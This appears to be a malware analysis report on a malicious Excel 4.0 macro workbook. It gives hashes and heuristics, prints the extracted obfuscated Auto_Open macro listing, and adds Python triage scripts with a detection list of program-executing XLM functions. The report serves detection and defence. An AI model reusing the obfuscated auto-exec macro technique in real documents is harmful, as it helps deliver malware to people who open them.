Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4f28141d80a61692…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 36.5 KB
Created: 2020-11-27 11:45:45
Authoring application: Microsoft Excel
First seen: 2021-01-11
MD5: 980cfcf720847a267a063523a3cbc056
SHA-1: 530bda2ba05a3b2b6b91fe71fc9b663fd3ea61c1
SHA-256: 4f28141d80a61692a93798b037d5d6a5808db8a1a361c862194d2d84c37ae822
Risk score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. In BIFF such a name is usually stored not as the text "Auto_Open" but as a one-byte built-in identifier (0x01 for Auto_Open, 0x02 for Auto_Close), and a spelled-out name may be UTF-16 encoded or case-varied, so a plain byte-string search for "Auto_Open" can miss it. The recovered macro listing below (built-in-name 1 Auto_Open with a 7-byte PtgRef3d formula pointing at C185) confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with XLM formula APIs that can invoke programs, write files, or transfer control without any VBA. Note that no such function appears literally in the listing below: the code builds names and values at run time with SET.NAME and HLOOKUP and reaches its routine through an alias (SET.NAME("fcrEwXhW",C89) followed by fcrEwXhW()), which is a common XLM obfuscation, so the exact API used is only visible by emulating the macro, for example with XLMMacroDeobfuscator, rather than by string-matching the static listing.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook contains an Excel 4.0 macro sheet sub-stream; here the BOUNDSHEET record marks the visible sheet cqGp as an Excel 4.0 macro sheet. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
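
The first and third heuristics key on two BIFF records: BOUNDSHEET (sheet type byte 0x01 marks an Excel 4.0 macro sheet) and Lbl (a defined name whose text may be a one-byte built-in id, UTF-16, or a case variant). The following is an added example, not code from this report, the scanner, or oletools: it walks a raw Workbook stream and reports macro sheets and auto-exec names however the name is encoded. The stream is constructed inline with small record builders; the sheet name cqGp and the C185 target mirror the listing; CONTINUE records, rich-text string runs and the ExternSheet (ixti) table are not handled, so it is a triage check rather than a full BIFF parser.

```python
import struct

# BIFF8 record ids and flag bits used below; layouts follow MS-XLS.
REC_BOUNDSHEET = 0x0085          # BoundSheet8: one per sheet sub-stream
REC_LBL = 0x0018                 # Lbl: a defined name plus its formula (rgce)
DT_XLM_MACRO_SHEET = 0x01        # BoundSheet8.dt for an Excel 4.0 macro sheet
LBL_FBUILTIN = 0x0020            # Lbl.flags: name is a one-byte built-in id
BUILTIN_NAMES = {0x01: "Auto_Open", 0x02: "Auto_Close",
                 0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}
AUTO_EXEC = {n.lower() for n in BUILTIN_NAMES.values()}
PTG_REF3D = {0x3A, 0x5A, 0x7A}   # PtgRef3d in its ref/value/array classes


def iter_records(stream):
    """Yield (record id, payload) for each record of a raw Workbook stream.
    CONTINUE records are not merged; the records read here never need it."""
    off = 0
    while off + 4 <= len(stream):
        rid, size = struct.unpack_from("<HH", stream, off)
        yield rid, stream[off + 4:off + 4 + size]
        off += 4 + size


def decode_xl_string(buf, off, cch):
    """XLUnicodeStringNoCch: one flag byte, then cch chars as 8-bit or UTF-16LE.
    Rich-text / extended-string runs (flag bits 3 and 2) are not handled."""
    high = buf[off] & 0x01
    raw = buf[off + 1:off + 1 + cch * (2 if high else 1)]
    return raw.decode("utf-16-le" if high else "latin-1"), off + 1 + len(raw)


def col_letters(col):
    """0-based column index to A1-style letters (0 -> A, 27 -> AB)."""
    s, col = "", col + 1
    while col:
        col, r = divmod(col - 1, 26)
        s = chr(65 + r) + s
    return s


def parse_lbl(payload):
    """Return (name, is_builtin, itab, target cell or None) for one Lbl record."""
    flags, _chkey, cch, cce, _rsv, itab = struct.unpack_from("<HBBHHH", payload, 0)
    text, off = decode_xl_string(payload, 14, cch)     # 10 bytes above + 4 reserved
    builtin = bool(flags & LBL_FBUILTIN)
    code = ord(text[:1] or "\0")
    name = BUILTIN_NAMES.get(code, "builtin_0x%02x" % code) if builtin else text
    rgce = payload[off:off + cce]
    target = None
    if len(rgce) >= 7 and rgce[0] in PTG_REF3D:         # ixti, rw, col (bits 0-13)
        _ixti, rw, col = struct.unpack_from("<HHH", rgce, 1)
        target = "%s%d" % (col_letters(col & 0x3FFF), rw + 1)
    return name, builtin, itab, target


def scan_workbook_stream(stream):
    """List XLM macro sheets and auto-exec names, however the name is encoded."""
    report = {"macro_sheets": [], "auto_exec": []}
    for rid, payload in iter_records(stream):
        if rid == REC_BOUNDSHEET:           # lbPlyPos(4) hsState(1) dt(1) cch(1) str
            name, _ = decode_xl_string(payload, 7, payload[6])
            if payload[5] == DT_XLM_MACRO_SHEET:
                report["macro_sheets"].append(name)
        elif rid == REC_LBL:
            name, builtin, itab, target = parse_lbl(payload)
            if name.lower() in AUTO_EXEC:
                report["auto_exec"].append(
                    {"name": name, "builtin": builtin, "itab": itab, "target": target})
    return report


# Constructed sample stream (not bytes from the analysed file): builders for the
# two record types, then one worksheet, one macro sheet and Auto_Open in three
# encodings.
def _record(rid, payload):
    return struct.pack("<HH", rid, len(payload)) + payload

def _xl_string(text, high=False):
    return bytes([1 if high else 0]) + text.encode("utf-16-le" if high else "latin-1")

def build_boundsheet(name, dt, hs_state=0):
    body = struct.pack("<IBB", 0, hs_state, dt) + bytes([len(name)]) + _xl_string(name)
    return _record(REC_BOUNDSHEET, body)

def build_lbl(text, row, col, builtin=False, high=False, itab=0):
    """Lbl whose rgce is a 7-byte PtgRef3d to (row, col); ixti 0 stands in for
    the ExternSheet index, which this check does not resolve."""
    rgce = struct.pack("<BHHH", 0x3A, 0, row, col)
    head = struct.pack("<HBBHHH", LBL_FBUILTIN if builtin else 0, 0, len(text),
                       len(rgce), 0, itab) + b"\0" * 4
    return _record(REC_LBL, head + _xl_string(text, high) + rgce)

SAMPLE_STREAM = (
    build_boundsheet("Sheet", 0x00)                  # ordinary worksheet
    + build_boundsheet("cqGp", DT_XLM_MACRO_SHEET)   # macro sheet, as in the listing
    + build_lbl("\x01", 184, 2, builtin=True)        # built-in id 1 = Auto_Open -> C185
    + build_lbl("Auto_Open", 184, 2, high=True)      # UTF-16: no ASCII b"Auto_Open"
    + build_lbl("auTo_oPen", 0, 0)                   # case variant of the ASCII name
)
```

On a real file, feed it the stream from olefile (an oletools dependency): `scan_workbook_stream(olefile.OleFileIO(path).openstream("Workbook").read())`. The point of the three encodings is that `b"Auto_Open" in stream` is false for the constructed sample while all three names are recovered; olevba's BIFF plugin does the same decoding over the full record set.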

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6693 bytes
SHA-256: a623a69eb47ce4249fd28d6492496b7a60875126c0da83a23db6065d2a87559f

Preview: first 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  cqGp
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C185 
' 0018     23 LABEL : Cell Value, String Constant - BhWcgSJh len=0 
' 0018     21 LABEL : Cell Value, String Constant - BxBMxg len=0 
' 0018     22 LABEL : Cell Value, String Constant - fBPeREi len=0 
' 0018     23 LABEL : Cell Value, String Constant - fcrEwXhW len=0 
' 0018     21 LABEL : Cell Value, String Constant - gaGVbY len=0 
' 0018     20 LABEL : Cell Value, String Constant - iDbyb len=0 
' 0018     22 LABEL : Cell Value, String Constant - iDkxPlO len=0 
' 0018     27 LABEL : Cell Value, String Constant - jwVZkWPSIgjM len=0 
' 0018     25 LABEL : Cell Value, String Constant - KRBSschGtV len=0 
' 0018     23 LABEL : Cell Value, String Constant - lOhOayac len=0 
' 0018     20 LABEL : Cell Value, String Constant - lsnyY len=0 
' 0018     25 LABEL : Cell Value, String Constant - nIxZGHhmSm len=0 
' 0018     21 LABEL : Cell Value, String Constant - oksrDf len=0 
' 0018     24 LABEL : Cell Value, String Constant - ORxmuNgQs len=0 
' 0018     26 LABEL : Cell Value, String Constant - QYewakSgZMy len=0 
' 0018     27 LABEL : Cell Value, String Constant - STARnbevUiWx len=0 
' 0018     25 LABEL : Cell Value, String Constant - TirrQToaTc len=0 
' 0018     20 LABEL : Cell Value, String Constant - TMKSt len=0 
' 0018     20 LABEL : Cell Value, String Constant - wPZzX len=0 
' 0018     23 LABEL : Cell Value, String Constant - yznknkAM len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  cqGp,P52,"",396.00000000000000000000
'  cqGp,P53,"",958.00000000000000000000
'  cqGp,P54,"",294.00000000000000000000
'  cqGp,P55,"",805.00000000000000000000
'  cqGp,P56,"",395.00000000000000000000
'  cqGp,P57,"",-749.00000000000000000000
'  cqGp,C89,"SET.NAME("yznknkAM",0+VALUE("0"))",""
'  cqGp,C91,"SET.NAME("STARnbevUiWx",yznknkAM)",""
'  cqGp,C93,"SET.NAME("QYewakSgZMy",yznknkAM)",""
'  cqGp,C95,"SET.NAME("gaGVbY",COUNTA(lOhOayac))",""
'  cqGp,C99,"SET.NAME("wPZzX",COUNTA(jwVZkWPSIgjM))",""
'  cqGp,C101,[],""
'  cqGp,C106,"SET.NAME("fBPeREi","")",""
'  cqGp,C111,"STARnbevUiWx",""
'  cqGp,C113,"SET.NAME("TMKSt",HLOOKUP("*",lOhOayac,STARnbevUiWx,FALSE))",""
'  cqGp,C116,"BhWcgSJh",""
'  cqGp,C121,"SET.NAME("BxBMxg",yznknkAM)",""
'  cqGp,C124,[],""
'  cqGp,C126,"BxBMxg",""
'  cqGp,C130,"iDbyb",""
'  cqGp,C133,"lsnyY",""
'  cqGp,C136,"iDkxPlO",""
'  cqGp,C140,"SET.NAME("TirrQToaTc",VALUE(HLOOKUP("*",jwVZkWPSIgjM,iDkxPlO,FALSE)))",""
'  cqGp,C145,"oksrDf",""
'  cqGp,C147,"fBPeREi",""
'  cqGp,C152,"QYewakSgZMy",""
'  cqGp,C156,NEXT(),""
'  cqGp,C161,"KRBSschGtV",""
'  cqGp,C166,[],""
'  cqGp,C171,"ORxmuNgQs",""
'  cqGp,C176,NEXT(),""
'  cqGp,C180,RETURN(),""
'  cqGp,C212,"SET.NAME("fcrEwXhW",C89)",""
'  cqGp,C214,"lOhOayac",""
'  cqGp,C216,"SET.NAME("jwVZkWPSIgjM",R50C14)",""
'  cqGp,C219,"SET.NAME("ORxmuNgQs",230)",""
'  cqGp,C224,"SET.NAME("nIxZGHhmSm",3)",""
'  cqGp,C229,fcrEwXhW(),""
'  cqGp,C230,HALT(),""
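
The listing contains no literal EXEC, CALL or REGISTER: names are assigned at run time with SET.NAME, values are pulled from worksheet ranges with HLOOKUP, the routine ending in RETURN() at C180 is entered through SET.NAME("fcrEwXhW",C89) followed by fcrEwXhW() at C229, and three cells ([]) were not decoded at all. The following added example, not part of this report or of oletools, parses olevba's Sheet,Reference,Formula,Value rows (a subset of the rows above is embedded verbatim) and reports SET.NAME aliases, calls made through an alias that resolves to a cell, run-time lookups, undecoded cells and any literal dangerous built-ins. The DANGEROUS and LOOKUPS sets are my own selection, and the single EXEC row is constructed, not from the sample, so that the dangerous-function branch is exercised.

```python
import re

# Rows copied verbatim from the olevba formula listing above (a subset).
SAMPLE_LISTING = """\
' Sheet,Reference,Formula,Value
'  cqGp,P52,"",396.00000000000000000000
'  cqGp,C89,"SET.NAME("yznknkAM",0+VALUE("0"))",""
'  cqGp,C101,[],""
'  cqGp,C113,"SET.NAME("TMKSt",HLOOKUP("*",lOhOayac,STARnbevUiWx,FALSE))",""
'  cqGp,C156,NEXT(),""
'  cqGp,C180,RETURN(),""
'  cqGp,C212,"SET.NAME("fcrEwXhW",C89)",""
'  cqGp,C216,"SET.NAME("jwVZkWPSIgjM",R50C14)",""
'  cqGp,C229,fcrEwXhW(),""
'  cqGp,C230,HALT(),""
"""

# Constructed control row, NOT from the sample, so that the dangerous-function
# branch below fires on something.
CONSTRUCTED_EXEC_ROW = '\'  cqGp,C300,"EXEC("notepad.exe")",""\n'

# XLM built-ins that run programs, write files or register native code.
DANGEROUS = {"EXEC", "CALL", "REGISTER", "REGISTER.ID", "RUN", "FOPEN",
             "FWRITE", "FWRITELN", "FORMULA", "FORMULA.FILL", "FORMULA.ARRAY"}
# Built-ins that fetch code or data from cells at run time.
LOOKUPS = {"HLOOKUP", "VLOOKUP", "INDIRECT", "OFFSET", "INDEX"}

ROW_RE = re.compile(r"^'\s*([^,]+),([A-Z]{1,3}\d+),(.*),([^,]*)$")
SET_NAME_RE = re.compile(r'^SET\.NAME\("([^"]+)",(.*)\)$')
CALL_RE = re.compile(r"^([A-Za-z_][\w.]*)\(\)$")
FUNC_RE = re.compile(r"(?<![\w.])([A-Z][A-Z0-9.]*)\(")   # built-ins are upper-case
CELL_RE = re.compile(r"^(?:[A-Z]{1,3}\d+|R\d+C\d+)$")


def parse_rows(listing):
    """Return (sheet, ref, formula) triples from olevba's Sheet,Reference,Formula,Value
    rows. The formula is wrapped in double quotes but inner quotes are not escaped,
    so the csv module cannot parse it: the value is whatever follows the last comma
    and the formula is everything between the reference and that comma."""
    rows = []
    for line in listing.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue                       # BIFF dump lines, header, blank lines
        sheet, ref, formula, _value = m.groups()
        if len(formula) >= 2 and formula[0] == formula[-1] == '"':
            formula = formula[1:-1]
        rows.append((sheet, ref, formula))
    return rows


def analyze_listing(listing):
    """Static triage of an XLM formula listing: SET.NAME aliases, calls made through
    an alias that resolves to a cell, run-time lookups, literal dangerous built-ins,
    and cells olevba could not decode ('[]')."""
    rows = parse_rows(listing)
    names = {}
    for _sheet, _ref, formula in rows:       # pass 1: aliases, in any listing order
        m = SET_NAME_RE.match(formula)
        if m:
            names[m.group(1)] = m.group(2)
    calls, lookups, dangerous, undecoded = [], [], [], []
    for _sheet, ref, formula in rows:        # pass 2: what each cell does
        if formula == "[]":
            undecoded.append(ref)
            continue
        funcs = set(FUNC_RE.findall(formula))
        dangerous.extend((ref, f) for f in sorted(funcs & DANGEROUS))
        if funcs & LOOKUPS:
            lookups.append(ref)
        m = CALL_RE.match(formula)
        if m and CELL_RE.match(names.get(m.group(1), "")):
            # name() where name was SET.NAME'd to a cell: an indirect subroutine call
            calls.append((ref, m.group(1), names[m.group(1)]))
    return {"names": names, "calls": calls, "lookups": lookups,
            "dangerous": dangerous, "undecoded": undecoded}
```

Run it over the whole artifact with `analyze_listing(open("xlm_macros.txt").read())`. Entries in `calls` are the places to start emulation from; a non-empty `undecoded` list means the static view is incomplete; and an empty `dangerous` list on an obfuscated sheet, as here, is not evidence of absence, only that the function name is assembled at run time.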